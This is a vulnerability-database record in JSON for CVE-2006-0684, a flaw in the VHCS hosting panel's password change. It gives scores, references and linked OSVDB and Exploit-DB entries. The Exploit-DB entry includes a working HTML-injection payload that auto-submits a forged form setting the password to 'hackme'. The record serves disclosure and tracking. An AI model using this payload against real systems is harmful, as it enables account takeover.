{"id": "CVE-2006-0684", "bulletinFamily": "NVD", "title": "CVE-2006-0684", "description": "change_password.php in Virtual Hosting Control System (VHCS) 2.4.7.1 and earlier does not verify the old password when a user changes the password, which may allow remote attackers to gain unauthorized access.", "published": "2006-02-15T00:02:00", "modified": "2018-10-19T15:45:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0684", "reporter": "cve@mitre.org", "references": ["http://www.rs-labs.com/adv/RS-Labs-Advisory-2006-1.txt", "http://www.securityfocus.com/bid/16600", "https://exchange.xforce.ibmcloud.com/vulnerabilities/24665", "http://secunia.com/advisories/18799", "http://www.vupen.com/english/advisories/2006/0534", "http://www.securityfocus.com/archive/1/424816/100/0/threaded"], "cvelist": ["CVE-2006-0684"], "type": "cve", "lastseen": "2019-05-29T18:08:31", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "78139b1dc44f2915b7cec40cac305949"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvelist", "hash": "1145ebb2dc94a2803ee9ecb060ac53b6"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "a11071654cde664199dac48330e1f990"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "2645533de90d66e2d78a58eed9858e89"}, {"key": "href", "hash": "3d58674970e192f19f10afe360841c38"}, {"key": "modified", "hash": "59fd48a382ca0cc80a1639dbe0ef7666"}, {"key": "published", "hash": "c913da930ab1801ce2e67dc7f981856f"}, {"key": "references", "hash": "5cb8f3831c366d656d8b201a159c2f49"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "91bf4ac3c97f7aa3f4ae607073276380"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "cbcfb1903af93847bc5f79d87a605f1d497391dbb999c39ee824c48c69ed4770", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:27204"]}, {"type": "osvdb", "idList": ["OSVDB:23107"]}], "modified": "2019-05-29T18:08:31"}, "score": {"value": 7.1, "vector": "NONE", "modified": "2019-05-29T18:08:31"}, "vulnersScore": 7.1}, "objectVersion": "1.3", "cpe": [], "affectedSoftware": [{"name": "virtual_hosting_control_system virtual_hosting_control_system", "operator": "le", "version": "2.4.7.1"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": true, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": [], "cwe": ["NVD-CWE-Other"]}

{"osvdb": [{"lastseen": "2017-04-28T13:20:20", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.vhcs.net/\n[Secunia Advisory ID:18799](https://secuniaresearch.flexerasoftware.com/advisories/18799/)\n[Related OSVDB ID: 23108](https://vulners.com/osvdb/OSVDB:23108)\n[Related OSVDB ID: 23106](https://vulners.com/osvdb/OSVDB:23106)\n[Related OSVDB ID: 23109](https://vulners.com/osvdb/OSVDB:23109)\nOther Advisory URL: http://www.rs-labs.com/adv/RS-Labs-Advisory-2006-1.txt\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0215.html\nKeyword: RS-2006-1\nFrSIRT Advisory: ADV-2006-0534\n[CVE-2006-0684](https://vulners.com/cve/CVE-2006-0684)\nBugtraq ID: 16600\n", "modified": "2006-02-11T06:02:44", "published": "2006-02-11T06:02:44", "href": "https://vulners.com/osvdb/OSVDB:23107", "id": "OSVDB:23107", "title": "VHCS change_password.php Current Password Weakness", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T05:20:28", "bulletinFamily": "exploit", "description": "Virtual Hosting Control System 2.2/2.4 change_password.php Current Password Weakness. CVE-2006-0684. Webapps exploit for php platform", "modified": "2006-02-13T00:00:00", "published": "2006-02-13T00:00:00", "id": "EDB-ID:27204", "href": "https://www.exploit-db.com/exploits/27204/", "type": "exploitdb", "title": "Virtual Hosting Control System 2.2/2.4 change_password.php Current Password Weakness", "sourceData": "source: http://www.securityfocus.com/bid/16600/info\r\n\r\nVirtual Hosting Control System (VHCS) is prone to multiple input and access vulnerabilities.\r\n\r\nVHCS is prone to an HTML-injection vulnerability and an authentication-bypass vulnerability. These issues could be exploited to gain administrative access to the application; other attacks are also possible.\r\n\r\n</form><form name=\"dsr\" method=\"post\" action=\"ch%61nge_password.php\"><input name=\"pass\" value=\"hackme\"><input name=\"pass_rep\" value=\"hackme\"><input name=\"uaction\" value=\"updt_pass\"></form><script>document.dsr.submit()</script>", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/27204/"}]}